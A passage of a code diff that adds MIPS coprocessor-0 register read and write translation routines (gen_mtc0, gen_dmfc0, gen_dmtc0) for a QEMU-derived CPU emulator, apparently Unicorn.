break; + default: + goto cp0_unimplemented; + } + break; + case 26: + /* ignored */ + rn = "ECC"; + break; + case 27: + switch (sel) { + case 0: case 1: case 2: case 3: + /* ignored */ + rn = "CacheErr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 28: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_helper_mtc0_taglo(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TagLo"; + break; + case 1: + case 3: + case 5: + case 7: + gen_helper_mtc0_datalo(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "DataLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 29: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_helper_mtc0_taghi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TagHi"; + break; + case 1: + case 3: + case 5: + case 7: + gen_helper_mtc0_datahi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "DataHi"; + break; + default: + rn = "invalid sel"; + goto cp0_unimplemented; + } + break; + case 30: + switch (sel) { + case 0: + gen_mtc0_store64(ctx, arg, offsetof(CPUMIPSState, CP0_ErrorEPC)); + rn = "ErrorEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 31: + switch (sel) { + case 0: + /* EJTAG support */ + gen_mtc0_store32(ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); + rn = "DESAVE"; + break; + case 2: case 3: case 4: case 5: case 6: case 7: + CP0_CHECK(ctx->kscrexist & (1 << sel)); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, CP0_KScratch[sel-2])); + rn = "KScratch"; + break; + default: + goto cp0_unimplemented; + } + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + default: + goto cp0_unimplemented; + } + (void)rn; /* avoid a compiler warning */ + LOG_DISAS("mtc0 %s (reg %d sel %d)\n", rn, reg, sel); + /* For simplicity assume that all writes can cause interrupts. 
*/ + //if (use_icount) { + // gen_io_end(); + // ctx->bstate = BS_STOP; + //} + return; + +cp0_unimplemented: + LOG_DISAS("mtc0 %s (reg %d sel %d)\n", rn, reg, sel); +} + +#if defined(TARGET_MIPS64) +static void gen_dmfc0(DisasContext *ctx, TCGv arg, int reg, int sel) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *rn = "invalid"; + + if (sel != 0) + check_insn(ctx, ISA_MIPS64); + + switch (reg) { + case 0: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Index)); + rn = "Index"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_mvpcontrol(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "MVPControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_mvpconf0(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "MVPConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_mvpconf1(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "MVPConf1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 1: + switch (sel) { + case 0: + CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); + gen_helper_mfc0_random(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "Random"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEControl)); + rn = "VPEControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf0)); + rn = "VPEConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf1)); + rn = "VPEConf1"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_YQMask)); + rn = "YQMask"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPESchedule)); + rn = "VPESchedule"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + 
tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPEScheFBack)); + rn = "VPEScheFBack"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEOpt)); + rn = "VPEOpt"; + break; + default: + goto cp0_unimplemented; + } + break; + case 2: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo0)); + rn = "EntryLo0"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tcstatus(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCStatus"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tcbind(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCBind"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_dmfc0_tcrestart(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCRestart"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_dmfc0_tchalt(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCHalt"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_dmfc0_tccontext(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCContext"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_dmfc0_tcschedule(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCSchedule"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_dmfc0_tcschefback(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCScheFBack"; + break; + default: + goto cp0_unimplemented; + } + break; + case 3: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo1)); + rn = "EntryLo1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 4: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_Context)); + rn = "Context"; + break; + case 1: +// gen_helper_dmfc0_contextconfig(arg); /* SmartMIPS ASE */ + rn = "ContextConfig"; + goto cp0_unimplemented; +// break; + case 2: + 
CP0_CHECK(ctx->ulri); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + rn = "UserLocal"; + break; + default: + goto cp0_unimplemented; + } + break; + case 5: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PageMask)); + rn = "PageMask"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PageGrain)); + rn = "PageGrain"; + break; + default: + goto cp0_unimplemented; + } + break; + case 6: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Wired)); + rn = "Wired"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf0)); + rn = "SRSConf0"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf1)); + rn = "SRSConf1"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf2)); + rn = "SRSConf2"; + break; + case 4: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf3)); + rn = "SRSConf3"; + break; + case 5: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf4)); + rn = "SRSConf4"; + break; + default: + goto cp0_unimplemented; + } + break; + case 7: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_HWREna)); + rn = "HWREna"; + break; + default: + goto cp0_unimplemented; + } + break; + case 8: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); + rn = "BadVAddr"; + break; + case 1: + CP0_CHECK(ctx->bi); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_BadInstr)); + rn = "BadInstr"; + break; + case 2: + CP0_CHECK(ctx->bp); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrP)); + rn = "BadInstrP"; 
+ break; + default: + goto cp0_unimplemented; + } + break; + case 9: + switch (sel) { + case 0: + /* Mark as an IO operation because we read the time. */ + //if (use_icount) + // gen_io_start(); + gen_helper_mfc0_count(tcg_ctx, arg, tcg_ctx->cpu_env); + //if (use_icount) { + // gen_io_end(); + //} + /* Break the TB to be able to take timer interrupts immediately + after reading count. */ + ctx->bstate = BS_STOP; + rn = "Count"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + break; + case 10: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryHi)); + rn = "EntryHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 11: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Compare)); + rn = "Compare"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + break; + case 12: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Status)); + rn = "Status"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_IntCtl)); + rn = "IntCtl"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSCtl)); + rn = "SRSCtl"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); + rn = "SRSMap"; + break; + default: + goto cp0_unimplemented; + } + break; + case 13: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Cause)); + rn = "Cause"; + break; + default: + goto cp0_unimplemented; + } + break; + case 14: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); + rn = "EPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 15: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, 
CP0_PRid)); + rn = "PRid"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_EBase)); + rn = "EBase"; + break; + default: + goto cp0_unimplemented; + } + break; + case 16: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config0)); + rn = "Config"; + break; + case 1: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config1)); + rn = "Config1"; + break; + case 2: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config2)); + rn = "Config2"; + break; + case 3: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config3)); + rn = "Config3"; + break; + case 4: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config4)); + rn = "Config4"; + break; + case 5: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config5)); + rn = "Config5"; + break; + /* 6,7 are implementation dependent */ + case 6: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config6)); + rn = "Config6"; + break; + case 7: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config7)); + rn = "Config7"; + break; + default: + goto cp0_unimplemented; + } + break; + case 17: + switch (sel) { + case 0: + gen_helper_dmfc0_lladdr(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "LLAddr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 18: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_1e0i(tcg_ctx, dmfc0_watchlo, arg, sel); + rn = "WatchLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 19: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_1e0i(tcg_ctx, mfc0_watchhi, arg, sel); + rn = "WatchHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 20: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS3); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_XContext)); + rn = "XContext"; + break; + default: + goto cp0_unimplemented; 
+ } + break; + case 21: + /* Officially reserved, but sel 0 is used for R1x000 framemask */ + CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Framemask)); + rn = "Framemask"; + break; + default: + goto cp0_unimplemented; + } + break; + case 22: + tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ + rn = "'Diagnostic"; /* implementation dependent */ + break; + case 23: + switch (sel) { + case 0: + gen_helper_mfc0_debug(tcg_ctx, arg, tcg_ctx->cpu_env); /* EJTAG support */ + rn = "Debug"; + break; + case 1: +// gen_helper_dmfc0_tracecontrol(arg, tcg_ctx->cpu_env); /* PDtrace support */ + rn = "TraceControl"; +// break; + case 2: +// gen_helper_dmfc0_tracecontrol2(arg, tcg_ctx->cpu_env); /* PDtrace support */ + rn = "TraceControl2"; +// break; + case 3: +// gen_helper_dmfc0_usertracedata(arg, tcg_ctx->cpu_env); /* PDtrace support */ + rn = "UserTraceData"; +// break; + case 4: +// gen_helper_dmfc0_tracebpc(arg, tcg_ctx->cpu_env); /* PDtrace support */ + rn = "TraceBPC"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 24: + switch (sel) { + case 0: + /* EJTAG support */ + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); + rn = "DEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 25: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Performance0)); + rn = "Performance0"; + break; + case 1: +// gen_helper_dmfc0_performance1(arg); + rn = "Performance1"; +// break; + case 2: +// gen_helper_dmfc0_performance2(arg); + rn = "Performance2"; +// break; + case 3: +// gen_helper_dmfc0_performance3(arg); + rn = "Performance3"; +// break; + case 4: +// gen_helper_dmfc0_performance4(arg); + rn = "Performance4"; +// break; + case 5: +// gen_helper_dmfc0_performance5(arg); + rn = "Performance5"; +// break; + case 6: +// gen_helper_dmfc0_performance6(arg); + rn = "Performance6"; +// break; + case 7: 
+// gen_helper_dmfc0_performance7(arg); + rn = "Performance7"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 26: + tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ + rn = "ECC"; + break; + case 27: + switch (sel) { + /* ignored */ + case 0: case 1: case 2: case 3: + tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ + rn = "CacheErr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 28: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_TagLo)); + rn = "TagLo"; + break; + case 1: + case 3: + case 5: + case 7: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DataLo)); + rn = "DataLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 29: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_TagHi)); + rn = "TagHi"; + break; + case 1: + case 3: + case 5: + case 7: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DataHi)); + rn = "DataHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 30: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); + rn = "ErrorEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 31: + switch (sel) { + case 0: + /* EJTAG support */ + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); + rn = "DESAVE"; + break; + case 2: case 3: case 4: case 5: case 6: case 7: + CP0_CHECK(ctx->kscrexist & (1 << sel)); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, CP0_KScratch[sel-2])); + rn = "KScratch"; + break; + default: + goto cp0_unimplemented; + } + break; + default: + goto cp0_unimplemented; + } + (void)rn; /* avoid a compiler warning */ + LOG_DISAS("dmfc0 %s (reg %d sel %d)\n", rn, reg, sel); + return; + +cp0_unimplemented: + LOG_DISAS("dmfc0 %s (reg %d sel %d)\n", rn, reg, sel); + gen_mfc0_unimplemented(ctx, arg); +} + 
+static void gen_dmtc0(DisasContext *ctx, TCGv arg, int reg, int sel) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *rn = "invalid"; + + if (sel != 0) + check_insn(ctx, ISA_MIPS64); + + //if (use_icount) + // gen_io_start(); + + switch (reg) { + case 0: + switch (sel) { + case 0: + gen_helper_mtc0_index(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Index"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_mvpcontrol(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "MVPControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + /* ignored */ + rn = "MVPConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + /* ignored */ + rn = "MVPConf1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 1: + switch (sel) { + case 0: + /* ignored */ + rn = "Random"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeconf1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEConf1"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_yqmask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "YQMask"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPESchedule)); + rn = "VPESchedule"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPEScheFBack)); + rn = "VPEScheFBack"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeopt(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEOpt"; + break; + default: + goto cp0_unimplemented; + } + break; + case 2: + switch (sel) { + case 0: + gen_helper_dmtc0_entrylo0(tcg_ctx, tcg_ctx->cpu_env, 
arg); + rn = "EntryLo0"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCStatus"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCBind"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCRestart"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCHalt"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCContext"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCSchedule"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCScheFBack"; + break; + default: + goto cp0_unimplemented; + } + break; + case 3: + switch (sel) { + case 0: + gen_helper_dmtc0_entrylo1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryLo1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 4: + switch (sel) { + case 0: + gen_helper_mtc0_context(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Context"; + break; + case 1: +// gen_helper_mtc0_contextconfig(tcg_ctx->cpu_env, arg); /* SmartMIPS ASE */ + rn = "ContextConfig"; + goto cp0_unimplemented; +// break; + case 2: + CP0_CHECK(ctx->ulri); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + rn = "UserLocal"; + break; + default: + goto cp0_unimplemented; + } + break; + case 5: + switch (sel) { + case 0: + gen_helper_mtc0_pagemask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "PageMask"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_pagegrain(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "PageGrain"; + break; + default: + goto 
cp0_unimplemented; + } + break; + case 6: + switch (sel) { + case 0: + gen_helper_mtc0_wired(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Wired"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf0"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf1"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf2(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf2"; + break; + case 4: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf3(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf3"; + break; + case 5: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf4(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf4"; + break; + default: + goto cp0_unimplemented; + } + break; + case 7: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_hwrena(tcg_ctx, tcg_ctx->cpu_env, arg); + ctx->bstate = BS_STOP; + rn = "HWREna"; + break; + default: + goto cp0_unimplemented; + } + break; + case 8: + switch (sel) { + case 0: + /* ignored */ + rn = "BadVAddr"; + break; + case 1: + /* ignored */ + rn = "BadInstr"; + break; + case 2: + /* ignored */ + rn = "BadInstrP"; + break; + default: + goto cp0_unimplemented; + } + break; + case 9: + switch (sel) { + case 0: + gen_helper_mtc0_count(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Count"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 10: + switch (sel) { + case 0: + gen_helper_mtc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 11: + switch (sel) { + case 0: + gen_helper_mtc0_compare(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Compare"; + break; + /* 6,7 are implementation dependent */ + default: + goto 
cp0_unimplemented; + } + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 12: + switch (sel) { + case 0: + save_cpu_state(ctx, 1); + gen_helper_mtc0_status(tcg_ctx, tcg_ctx->cpu_env, arg); + /* BS_STOP isn't good enough here, hflags may have changed. */ + gen_save_pc(ctx, ctx->pc + 4); + ctx->bstate = BS_EXCP; + rn = "Status"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_intctl(tcg_ctx, tcg_ctx->cpu_env, arg); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "IntCtl"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsctl(tcg_ctx, tcg_ctx->cpu_env, arg); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "SRSCtl"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_mtc0_store32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "SRSMap"; + break; + default: + goto cp0_unimplemented; + } + break; + case 13: + switch (sel) { + case 0: + save_cpu_state(ctx, 1); + /* Mark as an IO operation because we may trigger a software + interrupt. 
*/ + //if (use_icount) { + // gen_io_start(); + //} + gen_helper_mtc0_cause(tcg_ctx, tcg_ctx->cpu_env, arg); + //if (use_icount) { + // gen_io_end(); + //} + /* Stop translation as we may have triggered an intetrupt */ + ctx->bstate = BS_STOP; + rn = "Cause"; + break; + default: + goto cp0_unimplemented; + } + break; + case 14: + switch (sel) { + case 0: + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); + rn = "EPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 15: + switch (sel) { + case 0: + /* ignored */ + rn = "PRid"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_ebase(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EBase"; + break; + default: + goto cp0_unimplemented; + } + break; + case 16: + switch (sel) { + case 0: + gen_helper_mtc0_config0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 1: + /* ignored, read only */ + rn = "Config1"; + break; + case 2: + gen_helper_mtc0_config2(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config2"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 3: + /* ignored */ + rn = "Config3"; + break; + case 4: + /* currently ignored */ + rn = "Config4"; + break; + case 5: + gen_helper_mtc0_config5(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config5"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + /* 6,7 are implementation dependent */ + default: + rn = "Invalid config selector"; + goto cp0_unimplemented; + } + break; + case 17: + switch (sel) { + case 0: + gen_helper_mtc0_lladdr(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "LLAddr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 18: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_0e1i(tcg_ctx, mtc0_watchlo, arg, sel); + rn = "WatchLo"; 
+ break; + default: + goto cp0_unimplemented; + } + break; + case 19: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_0e1i(tcg_ctx, mtc0_watchhi, arg, sel); + rn = "WatchHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 20: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS3); + gen_helper_mtc0_xcontext(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "XContext"; + break; + default: + goto cp0_unimplemented; + } + break; + case 21: + /* Officially reserved, but sel 0 is used for R1x000 framemask */ + CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); + switch (sel) { + case 0: + gen_helper_mtc0_framemask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Framemask"; + break; + default: + goto cp0_unimplemented; + } + break; + case 22: + /* ignored */ + rn = "Diagnostic"; /* implementation dependent */ + break; + case 23: + switch (sel) { + case 0: + gen_helper_mtc0_debug(tcg_ctx, tcg_ctx->cpu_env, arg); /* EJTAG support */ + /* BS_STOP isn't good enough here, hflags may have changed. 
